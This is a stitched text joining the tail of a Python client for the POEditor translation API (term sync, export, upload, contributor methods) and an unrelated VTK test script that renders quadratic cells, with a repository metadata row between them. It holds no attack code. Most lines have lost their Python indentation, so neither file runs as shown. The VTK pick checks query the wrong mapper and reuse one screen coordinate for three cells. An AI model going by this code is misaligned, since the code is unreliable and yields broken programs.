return data['result']['terms']
def sync_terms(self, project_id, data):
"""
        Syncs your project with the list you send (terms that are not found
        in the posted list will be deleted from the project and the new ones
        added).
Please use with caution. If wrong data is sent, existing terms and their
translations might be irreversibly lost.
>>> data = [
{
"term": "Add new list",
"context": "",
"reference": "\/projects",
"plural": "",
"comment": ""
},
{
"term": "one project found",
"context": "",
"reference": "\/projects",
"plural": "%d projects found",
"comment": "Make sure you translate the plural forms",
"tags": [
"first_tag",
"second_tag"
]
},
{
"term": "Show all projects",
"context": "",
"reference": "\/projects",
"plural": "",
"tags": "just_a_tag"
}
]
"""
data = self._run(
url_path="projects/sync",
id=project_id,
data=json.dumps(data)
)
return data['result']['terms']
def update_project_language(self, project_id, language_code, data, fuzzy_trigger=None):
"""
Inserts / overwrites translations.
>>> data = [
{
"term": "Projects",
"context": "project list",
"translation": {
"content": "Des projets",
"fuzzy": 0
}
}
]
"""
kwargs = {}
if fuzzy_trigger is not None:
kwargs['fuzzy_trigger'] = fuzzy_trigger
data = self._run(
url_path="languages/update",
id=project_id,
language=language_code,
data=json.dumps(data),
**kwargs
)
return data['result']['translations']
def export(self, project_id, language_code, file_type='po', filters=None,
tags=None, local_file=None):
"""
        Returns terms / translations.
        filters - filter results by self.FILTER_BY
        tags - filter results by tags
        local_file - save content into it. If None, save content into a
            random temp file.
>>> tags = 'name-of-tag'
>>> tags = ["name-of-tag"]
>>> tags = ["name-of-tag", "name-of-another-tag"]
>>> filters = 'translated'
>>> filters = ["translated"]
>>> filters = ["translated", "not_fuzzy"]
"""
if file_type not in self.FILE_TYPES:
            raise POEditorArgsException(
                'file_type must be one of {}'.format(self.FILE_TYPES))
if filters and isinstance(filters, str) and filters not in self.FILTER_BY:
raise POEditorArgsException(
"filters - filter results by {}".format(self.FILTER_BY))
elif filters and set(filters).difference(set(self.FILTER_BY)):
raise POEditorArgsException(
"filters - filter results by {}".format(self.FILTER_BY))
data = self._run(
url_path="projects/export",
id=project_id,
language=language_code,
type=file_type,
filters=filters,
tags=tags
)
# The link of the file (expires after 10 minutes).
file_url = data['result']['url']
# Download file content:
res = requests.get(file_url, stream=True)
if not local_file:
tmp_file = tempfile.NamedTemporaryFile(
delete=False, suffix='.{}'.format(file_type))
tmp_file.close()
local_file = tmp_file.name
with open(local_file, 'w+b') as po_file:
for data in res.iter_content(chunk_size=1024):
po_file.write(data)
return file_url, local_file
def _upload(self, project_id, updating, file_path, language_code=None,
overwrite=False, sync_terms=False, tags=None, fuzzy_trigger=None):
"""
Internal: updates terms / translations
File uploads are limited to one every 30 seconds
"""
options = [
self.UPDATING_TERMS,
self.UPDATING_TERMS_TRANSLATIONS,
self.UPDATING_TRANSLATIONS
]
if updating not in options:
raise POEditorArgsException(
'Updating arg must be in {}'.format(options)
)
options = [
self.UPDATING_TERMS_TRANSLATIONS,
self.UPDATING_TRANSLATIONS
]
if language_code is None and updating in options:
            raise POEditorArgsException(
                'Language code is required when updating is '
                'terms_translations or translations'
            )
if updating == self.UPDATING_TRANSLATIONS:
tags = None
sync_terms = None
# Special content type:
tags = tags or ''
language_code = language_code or ''
sync_terms = '1' if sync_terms else '0'
overwrite = '1' if overwrite else '0'
fuzzy_trigger = '1' if fuzzy_trigger else '0'
project_id = str(project_id)
with open(file_path, 'r+b') as local_file:
data = self._run(
url_path="projects/upload",
id=project_id,
language=language_code,
file=local_file,
updating=updating,
tags=tags,
sync_terms=sync_terms,
overwrite=overwrite,
fuzzy_trigger=fuzzy_trigger
)
return data['result']
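    # NOTE: the file-upload ``update_terms`` defined below shadows the
    # JSON-based ``update_terms`` defined earlier in this class; in Python,
    # the later definition silently replaces the earlier one.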
def update_terms(self, project_id, file_path=None, language_code=None,
overwrite=False, sync_terms=False, tags=None, fuzzy_trigger=None):
"""
Updates terms
overwrite: set it to True if you want to overwrite translations
sync_terms: set it to True if you want to sync your terms (terms that
are not found in the uploaded file will be deleted from project
and the new ones added). Ignored if updating = translations
tags: Add tags to the project terms; available when updating terms or terms_translations;
            you can use the following keys: "all" - for all the imported terms, "new" - for
the terms which aren't already in the project, "obsolete" - for the terms which are
in the project but not in the imported file and "overwritten_translations" - for the
terms for which translations change
fuzzy_trigger: set it to True to mark corresponding translations from the
other languages as fuzzy for the updated values
"""
return self._upload(
project_id=project_id,
updating=self.UPDATING_TERMS,
file_path=file_path,
language_code=language_code,
overwrite=overwrite,
sync_terms=sync_terms,
tags=tags,
fuzzy_trigger=fuzzy_trigger
)
def update_terms_definitions(self, project_id, file_path=None,
language_code=None, overwrite=False,
sync_terms=False, tags=None, fuzzy_trigger=None):
warnings.warn(
"This method has been renamed update_terms_translations",
DeprecationWarning, stacklevel=2
)
return self.update_terms_translations(
project_id,
file_path,
language_code,
overwrite,
sync_terms,
tags,
fuzzy_trigger
)
def update_terms_translations(self, project_id, file_path=None,
language_code=None, overwrite=False,
sync_terms=False, tags=None, fuzzy_trigger=None):
"""
Updates terms translations
overwrite: set it to True if you want to overwrite translations
sync_terms: set it to True if you want to sync your terms (terms that
are not found in the uploaded file will be deleted from project
and the new ones added). Ignored if updating = translations
tags: Add tags to the project terms; available when updating terms or terms_translations;
            you can use the following keys: "all" - for all the imported terms, "new" - for
the terms which aren't already in the project, "obsolete" - for the terms which are
in the project but not in the imported file and "overwritten_translations" - for the
terms for which translations change
fuzzy_trigger: set it to True to mark corresponding translations from the
other languages as fuzzy for the updated values
"""
return self._upload(
project_id=project_id,
updating=self.UPDATING_TERMS_TRANSLATIONS,
file_path=file_path,
language_code=language_code,
overwrite=overwrite,
sync_terms=sync_terms,
tags=tags,
fuzzy_trigger=fuzzy_trigger
)
def update_definitions(self, project_id, file_path=None,
language_code=None, overwrite=False, fuzzy_trigger=None):
warnings.warn(
"This method has been renamed update_translations",
DeprecationWarning, stacklevel=2
)
return self.update_translations(
project_id,
file_path,
language_code,
overwrite,
fuzzy_trigger
)
def update_translations(self, project_id, file_path=None,
language_code=None, overwrite=False, fuzzy_trigger=None):
"""
Updates translations
overwrite: set it to True if you want to overwrite definitions
fuzzy_trigger: set it to True to mark corresponding translations from the
other languages as fuzzy for the updated values
"""
return self._upload(
project_id=project_id,
updating=self.UPDATING_TRANSLATIONS,
file_path=file_path,
language_code=language_code,
overwrite=overwrite,
fuzzy_trigger=fuzzy_trigger
)
def available_languages(self):
"""
Returns a comprehensive list of all languages supported by POEditor.
You can find it here (https://poeditor.com/docs/languages), too.
"""
data = self._run(
url_path="languages/available"
)
return data['result'].get('languages', [])
def list_contributors(self, project_id=None, language_code=None):
"""
Returns the list of contributors
"""
data = self._run(
url_path="contributors/list",
id=project_id,
language=language_code
)
return data['result'].get('contributors', [])
def add_contributor(self, project_id, name, email, language_code):
"""
Adds a contributor to a project language
"""
self._run(
url_path="contributors/add",
id=project_id,
name=name,
email=email,
language=language_code
)
return True
def add_administrator(self, project_id, name, email):
"""
        Adds an administrator to a project
"""
self._run(
url_path="contributors/add",
id=project_id,
name=name,
email=email,
admin=True
)
return True
def remove_contributor(self, project_id, email, language):
"""
Removes a contributor
"""
self._run(
url_path="contributors/remove",
id=project_id,
email=email,
language=language
)
return True
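
# Illustrative sketch (editor's example, not part of the original client):
# minimal end-to-end usage of the class defined above. The api_token and
# project id are placeholders. Guarded so importing never runs it.
if __name__ == "__main__":
    client = POEditorAPI(api_token='REPLACE_WITH_YOUR_TOKEN')
    for project in client.list_projects():
        print(project['id'], project['name'])
    # Export the French translations of a project to a temporary .po file:
    # url, path = client.export(project_id=12345, language_code='fr')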
|
sporteasy/python-poeditor
|
poeditor/client.py
|
Python
|
mit
| 25,407
|
[
"xTB"
] |
ec289f8aa362f20bb529a6ccdeb9c0d397ad96d5608cbdd5fd79fd0431533fd9
|
#!/usr/bin/env python
import sys
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# Prevent .pyc files being created.
# Stops the vtk source being polluted
# by .pyc files.
sys.dont_write_bytecode = True
import backdrop
# Contour every quadratic cell type
# Create a scene with one of each cell type.
# QuadraticEdge
edgePoints = vtk.vtkPoints()
edgePoints.SetNumberOfPoints(3)
edgePoints.InsertPoint(0, 0, 0, 0)
edgePoints.InsertPoint(1, 1.0, 0, 0)
edgePoints.InsertPoint(2, 0.5, 0.25, 0)
edgeScalars = vtk.vtkFloatArray()
edgeScalars.SetNumberOfTuples(3)
edgeScalars.InsertValue(0, 0.0)
edgeScalars.InsertValue(1, 0.0)
edgeScalars.InsertValue(2, 0.9)
aEdge = vtk.vtkQuadraticEdge()
aEdge.GetPointIds().SetId(0, 0)
aEdge.GetPointIds().SetId(1, 1)
aEdge.GetPointIds().SetId(2, 2)
aEdgeGrid = vtk.vtkUnstructuredGrid()
aEdgeGrid.Allocate(1, 1)
aEdgeGrid.InsertNextCell(aEdge.GetCellType(), aEdge.GetPointIds())
aEdgeGrid.SetPoints(edgePoints)
aEdgeGrid.GetPointData().SetScalars(edgeScalars)
aEdgeMapper = vtk.vtkDataSetMapper()
aEdgeMapper.SetInputData(aEdgeGrid)
aEdgeMapper.ScalarVisibilityOff()
aEdgeActor = vtk.vtkActor()
aEdgeActor.SetMapper(aEdgeMapper)
aEdgeActor.GetProperty().SetRepresentationToWireframe()
aEdgeActor.GetProperty().SetAmbient(1.0)
# Quadratic triangle
triPoints = vtk.vtkPoints()
triPoints.SetNumberOfPoints(6)
triPoints.InsertPoint(0, 0.0, 0.0, 0.0)
triPoints.InsertPoint(1, 1.0, 0.0, 0.0)
triPoints.InsertPoint(2, 0.5, 0.8, 0.0)
triPoints.InsertPoint(3, 0.5, 0.0, 0.0)
triPoints.InsertPoint(4, 0.75, 0.4, 0.0)
triPoints.InsertPoint(5, 0.25, 0.4, 0.0)
triScalars = vtk.vtkFloatArray()
triScalars.SetNumberOfTuples(6)
triScalars.InsertValue(0, 0.0)
triScalars.InsertValue(1, 0.0)
triScalars.InsertValue(2, 0.0)
triScalars.InsertValue(3, 1.0)
triScalars.InsertValue(4, 0.0)
triScalars.InsertValue(5, 0.0)
aTri = vtk.vtkQuadraticTriangle()
aTri.GetPointIds().SetId(0, 0)
aTri.GetPointIds().SetId(1, 1)
aTri.GetPointIds().SetId(2, 2)
aTri.GetPointIds().SetId(3, 3)
aTri.GetPointIds().SetId(4, 4)
aTri.GetPointIds().SetId(5, 5)
aTriGrid = vtk.vtkUnstructuredGrid()
aTriGrid.Allocate(1, 1)
aTriGrid.InsertNextCell(aTri.GetCellType(), aTri.GetPointIds())
aTriGrid.SetPoints(triPoints)
aTriGrid.GetPointData().SetScalars(triScalars)
aTriMapper = vtk.vtkDataSetMapper()
aTriMapper.SetInputData(aTriGrid)
aTriMapper.ScalarVisibilityOff()
aTriActor = vtk.vtkActor()
aTriActor.SetMapper(aTriMapper)
aTriActor.GetProperty().SetRepresentationToWireframe()
aTriActor.GetProperty().SetAmbient(1.0)
# Quadratic quadrilateral
quadPoints = vtk.vtkPoints()
quadPoints.SetNumberOfPoints(8)
quadPoints.InsertPoint(0, 0.0, 0.0, 0.0)
quadPoints.InsertPoint(1, 1.0, 0.0, 0.0)
quadPoints.InsertPoint(2, 1.0, 1.0, 0.0)
quadPoints.InsertPoint(3, 0.0, 1.0, 0.0)
quadPoints.InsertPoint(4, 0.5, 0.0, 0.0)
quadPoints.InsertPoint(5, 1.0, 0.5, 0.0)
quadPoints.InsertPoint(6, 0.5, 1.0, 0.0)
quadPoints.InsertPoint(7, 0.0, 0.5, 0.0)
quadScalars = vtk.vtkFloatArray()
quadScalars.SetNumberOfTuples(8)
quadScalars.InsertValue(0, 0.0)
quadScalars.InsertValue(1, 0.0)
quadScalars.InsertValue(2, 1.0)
quadScalars.InsertValue(3, 1.0)
quadScalars.InsertValue(4, 1.0)
quadScalars.InsertValue(5, 0.0)
quadScalars.InsertValue(6, 0.0)
quadScalars.InsertValue(7, 0.0)
aQuad = vtk.vtkQuadraticQuad()
aQuad.GetPointIds().SetId(0, 0)
aQuad.GetPointIds().SetId(1, 1)
aQuad.GetPointIds().SetId(2, 2)
aQuad.GetPointIds().SetId(3, 3)
aQuad.GetPointIds().SetId(4, 4)
aQuad.GetPointIds().SetId(5, 5)
aQuad.GetPointIds().SetId(6, 6)
aQuad.GetPointIds().SetId(7, 7)
aQuadGrid = vtk.vtkUnstructuredGrid()
aQuadGrid.Allocate(1, 1)
aQuadGrid.InsertNextCell(aQuad.GetCellType(), aQuad.GetPointIds())
aQuadGrid.SetPoints(quadPoints)
aQuadGrid.GetPointData().SetScalars(quadScalars)
aQuadMapper = vtk.vtkDataSetMapper()
aQuadMapper.SetInputData(aQuadGrid)
aQuadMapper.ScalarVisibilityOff()
aQuadActor = vtk.vtkActor()
aQuadActor.SetMapper(aQuadMapper)
aQuadActor.GetProperty().SetRepresentationToWireframe()
aQuadActor.GetProperty().SetAmbient(1.0)
# Quadratic tetrahedron
tetPoints = vtk.vtkPoints()
tetPoints.SetNumberOfPoints(10)
tetPoints.InsertPoint(0, 0.0, 0.0, 0.0)
tetPoints.InsertPoint(1, 1.0, 0.0, 0.0)
tetPoints.InsertPoint(2, 0.5, 0.8, 0.0)
tetPoints.InsertPoint(3, 0.5, 0.4, 1.0)
tetPoints.InsertPoint(4, 0.5, 0.0, 0.0)
tetPoints.InsertPoint(5, 0.75, 0.4, 0.0)
tetPoints.InsertPoint(6, 0.25, 0.4, 0.0)
tetPoints.InsertPoint(7, 0.25, 0.2, 0.5)
tetPoints.InsertPoint(8, 0.75, 0.2, 0.5)
tetPoints.InsertPoint(9, 0.50, 0.6, 0.5)
tetScalars = vtk.vtkFloatArray()
tetScalars.SetNumberOfTuples(10)
tetScalars.InsertValue(0, 1.0)
tetScalars.InsertValue(1, 1.0)
tetScalars.InsertValue(2, 1.0)
tetScalars.InsertValue(3, 1.0)
tetScalars.InsertValue(4, 0.0)
tetScalars.InsertValue(5, 0.0)
tetScalars.InsertValue(6, 0.0)
tetScalars.InsertValue(7, 0.0)
tetScalars.InsertValue(8, 0.0)
tetScalars.InsertValue(9, 0.0)
aTet = vtk.vtkQuadraticTetra()
aTet.GetPointIds().SetId(0, 0)
aTet.GetPointIds().SetId(1, 1)
aTet.GetPointIds().SetId(2, 2)
aTet.GetPointIds().SetId(3, 3)
aTet.GetPointIds().SetId(4, 4)
aTet.GetPointIds().SetId(5, 5)
aTet.GetPointIds().SetId(6, 6)
aTet.GetPointIds().SetId(7, 7)
aTet.GetPointIds().SetId(8, 8)
aTet.GetPointIds().SetId(9, 9)
aTetGrid = vtk.vtkUnstructuredGrid()
aTetGrid.Allocate(1, 1)
aTetGrid.InsertNextCell(aTet.GetCellType(), aTet.GetPointIds())
aTetGrid.SetPoints(tetPoints)
aTetGrid.GetPointData().SetScalars(tetScalars)
aTetMapper = vtk.vtkDataSetMapper()
aTetMapper.SetInputData(aTetGrid)
aTetMapper.ScalarVisibilityOff()
aTetActor = vtk.vtkActor()
aTetActor.SetMapper(aTetMapper)
aTetActor.GetProperty().SetRepresentationToWireframe()
aTetActor.GetProperty().SetAmbient(1.0)
# Quadratic hexahedron
hexPoints = vtk.vtkPoints()
hexPoints.SetNumberOfPoints(20)
hexPoints.InsertPoint(0, 0, 0, 0)
hexPoints.InsertPoint(1, 1, 0, 0)
hexPoints.InsertPoint(2, 1, 1, 0)
hexPoints.InsertPoint(3, 0, 1, 0)
hexPoints.InsertPoint(4, 0, 0, 1)
hexPoints.InsertPoint(5, 1, 0, 1)
hexPoints.InsertPoint(6, 1, 1, 1)
hexPoints.InsertPoint(7, 0, 1, 1)
hexPoints.InsertPoint(8, 0.5, 0, 0)
hexPoints.InsertPoint(9, 1, 0.5, 0)
hexPoints.InsertPoint(10, 0.5, 1, 0)
hexPoints.InsertPoint(11, 0, 0.5, 0)
hexPoints.InsertPoint(12, 0.5, 0, 1)
hexPoints.InsertPoint(13, 1, 0.5, 1)
hexPoints.InsertPoint(14, 0.5, 1, 1)
hexPoints.InsertPoint(15, 0, 0.5, 1)
hexPoints.InsertPoint(16, 0, 0, 0.5)
hexPoints.InsertPoint(17, 1, 0, 0.5)
hexPoints.InsertPoint(18, 1, 1, 0.5)
hexPoints.InsertPoint(19, 0, 1, 0.5)
hexScalars = vtk.vtkFloatArray()
hexScalars.SetNumberOfTuples(20)
hexScalars.InsertValue(0, 1.0)
hexScalars.InsertValue(1, 1.0)
hexScalars.InsertValue(2, 1.0)
hexScalars.InsertValue(3, 1.0)
hexScalars.InsertValue(4, 1.0)
hexScalars.InsertValue(5, 1.0)
hexScalars.InsertValue(6, 1.0)
hexScalars.InsertValue(7, 1.0)
hexScalars.InsertValue(8, 0.0)
hexScalars.InsertValue(9, 0.0)
hexScalars.InsertValue(10, 0.0)
hexScalars.InsertValue(11, 0.0)
hexScalars.InsertValue(12, 0.0)
hexScalars.InsertValue(13, 0.0)
hexScalars.InsertValue(14, 0.0)
hexScalars.InsertValue(15, 0.0)
hexScalars.InsertValue(16, 0.0)
hexScalars.InsertValue(17, 0.0)
hexScalars.InsertValue(18, 0.0)
hexScalars.InsertValue(19, 0.0)
aHex = vtk.vtkQuadraticHexahedron()
aHex.GetPointIds().SetId(0, 0)
aHex.GetPointIds().SetId(1, 1)
aHex.GetPointIds().SetId(2, 2)
aHex.GetPointIds().SetId(3, 3)
aHex.GetPointIds().SetId(4, 4)
aHex.GetPointIds().SetId(5, 5)
aHex.GetPointIds().SetId(6, 6)
aHex.GetPointIds().SetId(7, 7)
aHex.GetPointIds().SetId(8, 8)
aHex.GetPointIds().SetId(9, 9)
aHex.GetPointIds().SetId(10, 10)
aHex.GetPointIds().SetId(11, 11)
aHex.GetPointIds().SetId(12, 12)
aHex.GetPointIds().SetId(13, 13)
aHex.GetPointIds().SetId(14, 14)
aHex.GetPointIds().SetId(15, 15)
aHex.GetPointIds().SetId(16, 16)
aHex.GetPointIds().SetId(17, 17)
aHex.GetPointIds().SetId(18, 18)
aHex.GetPointIds().SetId(19, 19)
aHexGrid = vtk.vtkUnstructuredGrid()
aHexGrid.Allocate(1, 1)
aHexGrid.InsertNextCell(aHex.GetCellType(), aHex.GetPointIds())
aHexGrid.SetPoints(hexPoints)
aHexGrid.GetPointData().SetScalars(hexScalars)
aHexMapper = vtk.vtkDataSetMapper()
aHexMapper.SetInputData(aHexGrid)
aHexMapper.ScalarVisibilityOff()
aHexActor = vtk.vtkActor()
aHexActor.SetMapper(aHexMapper)
aHexActor.GetProperty().SetRepresentationToWireframe()
aHexActor.GetProperty().SetAmbient(1.0)
# Quadratic wedge
wedgePoints = vtk.vtkPoints()
wedgePoints.SetNumberOfPoints(15)
wedgePoints.InsertPoint(0, 0, 0, 0)
wedgePoints.InsertPoint(1, 1, 0, 0)
wedgePoints.InsertPoint(2, 0, 1, 0)
wedgePoints.InsertPoint(3, 0, 0, 1)
wedgePoints.InsertPoint(4, 1, 0, 1)
wedgePoints.InsertPoint(5, 0, 1, 1)
wedgePoints.InsertPoint(6, 0.5, 0, 0)
wedgePoints.InsertPoint(7, 0.5, 0.5, 0)
wedgePoints.InsertPoint(8, 0, 0.5, 0)
wedgePoints.InsertPoint(9, 0.5, 0, 1)
wedgePoints.InsertPoint(10, 0.5, 0.5, 1)
wedgePoints.InsertPoint(11, 0, 0.5, 1)
wedgePoints.InsertPoint(12, 0, 0, 0.5)
wedgePoints.InsertPoint(13, 1, 0, 0.5)
wedgePoints.InsertPoint(14, 0, 1, 0.5)
wedgeScalars = vtk.vtkFloatArray()
wedgeScalars.SetNumberOfTuples(15)
wedgeScalars.InsertValue(0, 1.0)
wedgeScalars.InsertValue(1, 1.0)
wedgeScalars.InsertValue(2, 1.0)
wedgeScalars.InsertValue(3, 1.0)
wedgeScalars.InsertValue(4, 1.0)
wedgeScalars.InsertValue(5, 1.0)
wedgeScalars.InsertValue(6, 1.0)
wedgeScalars.InsertValue(7, 1.0)
wedgeScalars.InsertValue(8, 0.0)
wedgeScalars.InsertValue(9, 0.0)
wedgeScalars.InsertValue(10, 0.0)
wedgeScalars.InsertValue(11, 0.0)
wedgeScalars.InsertValue(12, 0.0)
wedgeScalars.InsertValue(13, 0.0)
wedgeScalars.InsertValue(14, 0.0)
aWedge = vtk.vtkQuadraticWedge()
aWedge.GetPointIds().SetId(0, 0)
aWedge.GetPointIds().SetId(1, 1)
aWedge.GetPointIds().SetId(2, 2)
aWedge.GetPointIds().SetId(3, 3)
aWedge.GetPointIds().SetId(4, 4)
aWedge.GetPointIds().SetId(5, 5)
aWedge.GetPointIds().SetId(6, 6)
aWedge.GetPointIds().SetId(7, 7)
aWedge.GetPointIds().SetId(8, 8)
aWedge.GetPointIds().SetId(9, 9)
aWedge.GetPointIds().SetId(10, 10)
aWedge.GetPointIds().SetId(11, 11)
aWedge.GetPointIds().SetId(12, 12)
aWedge.GetPointIds().SetId(13, 13)
aWedge.GetPointIds().SetId(14, 14)
aWedgeGrid = vtk.vtkUnstructuredGrid()
aWedgeGrid.Allocate(1, 1)
aWedgeGrid.InsertNextCell(aWedge.GetCellType(), aWedge.GetPointIds())
aWedgeGrid.SetPoints(wedgePoints)
aWedgeGrid.GetPointData().SetScalars(wedgeScalars)
wedgeContours = vtk.vtkClipDataSet()
wedgeContours.SetInputData(aWedgeGrid)
wedgeContours.SetValue(0.5)
aWedgeContourMapper = vtk.vtkDataSetMapper()
aWedgeContourMapper.SetInputConnection(wedgeContours.GetOutputPort())
aWedgeContourMapper.ScalarVisibilityOff()
aWedgeMapper = vtk.vtkDataSetMapper()
aWedgeMapper.SetInputData(aWedgeGrid)
aWedgeMapper.ScalarVisibilityOff()
aWedgeActor = vtk.vtkActor()
aWedgeActor.SetMapper(aWedgeMapper)
aWedgeActor.GetProperty().SetRepresentationToWireframe()
aWedgeActor.GetProperty().SetAmbient(1.0)
aWedgeContourActor = vtk.vtkActor()
aWedgeContourActor.SetMapper(aWedgeContourMapper)
aWedgeContourActor.GetProperty().SetAmbient(1.0)
# Quadratic pyramid
pyraPoints = vtk.vtkPoints()
pyraPoints.SetNumberOfPoints(13)
pyraPoints.InsertPoint(0, 0, 0, 0)
pyraPoints.InsertPoint(1, 1, 0, 0)
pyraPoints.InsertPoint(2, 1, 1, 0)
pyraPoints.InsertPoint(3, 0, 1, 0)
pyraPoints.InsertPoint(4, 0, 0, 1)
pyraPoints.InsertPoint(5, 0.5, 0, 0)
pyraPoints.InsertPoint(6, 1, 0.5, 0)
pyraPoints.InsertPoint(7, 0.5, 1, 0)
pyraPoints.InsertPoint(8, 0, 0.5, 0)
pyraPoints.InsertPoint(9, 0, 0, 0.5)
pyraPoints.InsertPoint(10, 0.5, 0, 0.5)
pyraPoints.InsertPoint(11, 0.5, 0.5, 0.5)
pyraPoints.InsertPoint(12, 0, 0.5, 0.5)
pyraScalars = vtk.vtkFloatArray()
pyraScalars.SetNumberOfTuples(13)
pyraScalars.InsertValue(0, 1.0)
pyraScalars.InsertValue(1, 1.0)
pyraScalars.InsertValue(2, 1.0)
pyraScalars.InsertValue(3, 1.0)
pyraScalars.InsertValue(4, 1.0)
pyraScalars.InsertValue(5, 1.0)
pyraScalars.InsertValue(6, 1.0)
pyraScalars.InsertValue(7, 1.0)
pyraScalars.InsertValue(8, 0.0)
pyraScalars.InsertValue(9, 0.0)
pyraScalars.InsertValue(10, 0.0)
pyraScalars.InsertValue(11, 0.0)
pyraScalars.InsertValue(12, 0.0)
aPyramid = vtk.vtkQuadraticPyramid()
aPyramid.GetPointIds().SetId(0, 0)
aPyramid.GetPointIds().SetId(1, 1)
aPyramid.GetPointIds().SetId(2, 2)
aPyramid.GetPointIds().SetId(3, 3)
aPyramid.GetPointIds().SetId(4, 4)
aPyramid.GetPointIds().SetId(5, 5)
aPyramid.GetPointIds().SetId(6, 6)
aPyramid.GetPointIds().SetId(7, 7)
aPyramid.GetPointIds().SetId(8, 8)
aPyramid.GetPointIds().SetId(9, 9)
aPyramid.GetPointIds().SetId(10, 10)
aPyramid.GetPointIds().SetId(11, 11)
aPyramid.GetPointIds().SetId(12, 12)
aPyramidGrid = vtk.vtkUnstructuredGrid()
aPyramidGrid.Allocate(1, 1)
aPyramidGrid.InsertNextCell(aPyramid.GetCellType(), aPyramid.GetPointIds())
aPyramidGrid.SetPoints(pyraPoints)
aPyramidGrid.GetPointData().SetScalars(pyraScalars)
pyraContours = vtk.vtkClipDataSet()
pyraContours.SetInputData(aPyramidGrid)
pyraContours.SetValue(0.5)
aPyramidContourMapper = vtk.vtkDataSetMapper()
aPyramidContourMapper.SetInputConnection(pyraContours.GetOutputPort())
aPyramidContourMapper.ScalarVisibilityOff()
aPyramidMapper = vtk.vtkDataSetMapper()
aPyramidMapper.SetInputData(aPyramidGrid)
aPyramidMapper.ScalarVisibilityOff()
aPyramidActor = vtk.vtkActor()
aPyramidActor.SetMapper(aPyramidMapper)
aPyramidActor.GetProperty().SetRepresentationToWireframe()
aPyramidActor.GetProperty().SetAmbient(1.0)
aPyramidContourActor = vtk.vtkActor()
aPyramidContourActor.SetMapper(aPyramidContourMapper)
aPyramidContourActor.GetProperty().SetAmbient(1.0)
# Create the rendering related stuff.
# Since some of our actors are a single vertex, we need to remove all
# cullers so the single vertex actors will render
ren1 = vtk.vtkRenderer()
ren1.GetCullers().RemoveAllItems()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
ren1.SetBackground(.1, .2, .3)
renWin.SetSize(400, 200)
# specify properties
ren1.AddActor(aEdgeActor)
ren1.AddActor(aTriActor)
ren1.AddActor(aQuadActor)
ren1.AddActor(aTetActor)
ren1.AddActor(aHexActor)
ren1.AddActor(aWedgeActor)
ren1.AddActor(aPyramidActor)
# places everyone!!
aTriActor.AddPosition(2, 0, 0)
aQuadActor.AddPosition(4, 0, 0)
aTetActor.AddPosition(6, 0, 0)
aHexActor.AddPosition(8, 0, 0)
aWedgeActor.AddPosition(10, 0, 0)
aPyramidActor.AddPosition(12, 0, 0)
[base, back, left] = backdrop.BuildBackdrop(-1, 15, -1, 4, -1, 2, .1)
ren1.AddActor(base)
base.GetProperty().SetDiffuseColor(.2, .2, .2)
ren1.AddActor(left)
left.GetProperty().SetDiffuseColor(.2, .2, .2)
ren1.AddActor(back)
back.GetProperty().SetDiffuseColor(.2, .2, .2)
ren1.ResetCamera()
ren1.GetActiveCamera().Dolly(2.5)
ren1.ResetCameraClippingRange()
renWin.Render()
# create a little scorecard above each of the cells. These are displayed
# if a ray cast hits the cell, otherwise they are not shown.
pm = vtk.vtkPlaneSource()
pm.SetXResolution(1)
pm.SetYResolution(1)
pmapper = vtk.vtkPolyDataMapper()
pmapper.SetInputConnection(pm.GetOutputPort())
# now try intersecting rays with the cell
cellPicker = vtk.vtkCellPicker()
edgeCheck = vtk.vtkActor()
edgeCheck.SetMapper(pmapper)
edgeCheck.AddPosition(0.5, 2.5, 0)
cellPicker.Pick(87, 71, 0, ren1)
cellId = cellPicker.GetCellId()
if (cellId != -1):
if (pmapper.GetInput().GetCellType(cellId)==aEdge.GetCellType()):
ren1.AddActor(edgeCheck)
triCheck = vtk.vtkActor()
triCheck.SetMapper(pmapper)
triCheck.AddPosition(2.5, 2.5, 0)
cellPicker.Pick(139, 72, 0, ren1)
cellId = cellPicker.GetCellId()
if (cellId != -1):
if (pmapper.GetInput().GetCellType(cellId)==aTri.GetCellType()):
ren1.AddActor(triCheck)
quadCheck = vtk.vtkActor()
quadCheck.SetMapper(pmapper)
quadCheck.AddPosition(4.5, 2.5, 0)
cellPicker.Pick(192, 78, 0, ren1)
cellId = cellPicker.GetCellId()
if (cellId != -1):
if (pmapper.GetInput().GetCellType(cellId)==aQuad.GetCellType()):
ren1.AddActor(quadCheck)
tetCheck = vtk.vtkActor()
tetCheck.SetMapper(pmapper)
tetCheck.AddPosition(6.5, 2.5, 0)
cellPicker.Pick(233, 70, 0, ren1)
cellId = cellPicker.GetCellId()
if (cellId != -1):
if (pmapper.GetInput().GetCellType(cellId)==aTet.GetCellType()):
ren1.AddActor(tetCheck)
hexCheck = vtk.vtkActor()
hexCheck.SetMapper(pmapper)
hexCheck.AddPosition(8.5, 2.5, 0)
cellPicker.Pick(287, 80, 0, ren1)
cellId = cellPicker.GetCellId()
if (cellId != -1):
if (pmapper.GetInput().GetCellType(cellId)==aHex.GetCellType()):
ren1.AddActor(hexCheck)
wedgeCheck = vtk.vtkActor()
wedgeCheck.SetMapper(pmapper)
wedgeCheck.AddPosition(10.5, 2.5, 0)
cellPicker.Pick(287, 80, 0, ren1)
cellId = cellPicker.GetCellId()
if (cellId != -1):
if (pmapper.GetInput().GetCellType(cellId)==aWedge.GetCellType()):
ren1.AddActor(wedgeCheck)
pyraCheck = vtk.vtkActor()
pyraCheck.SetMapper(pmapper)
pyraCheck.AddPosition(12.5, 2.5, 0)
cellPicker.Pick(287, 80, 0, ren1)
cellId = cellPicker.GetCellId()
if (cellId != -1):
if (pmapper.GetInput().GetCellType(cellId)==aPyramid.GetCellType()):
ren1.AddActor(pyraCheck)
# render the image
#
iren.Initialize()
#iren.Start()
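
# Illustrative sketch (editor's example, not part of the original test): the
# points/scalars/grid/mapper/actor boilerplate repeated above for each
# quadratic cell type could be factored into a helper along these lines
# (the helper name is hypothetical).
def make_cell_actor(cell, points, scalars):
    grid = vtk.vtkUnstructuredGrid()
    grid.Allocate(1, 1)
    grid.InsertNextCell(cell.GetCellType(), cell.GetPointIds())
    grid.SetPoints(points)
    grid.GetPointData().SetScalars(scalars)
    mapper = vtk.vtkDataSetMapper()
    mapper.SetInputData(grid)
    mapper.ScalarVisibilityOff()
    actor = vtk.vtkActor()
    actor.SetMapper(mapper)
    actor.GetProperty().SetRepresentationToWireframe()
    actor.GetProperty().SetAmbient(1.0)
    return grid, actor
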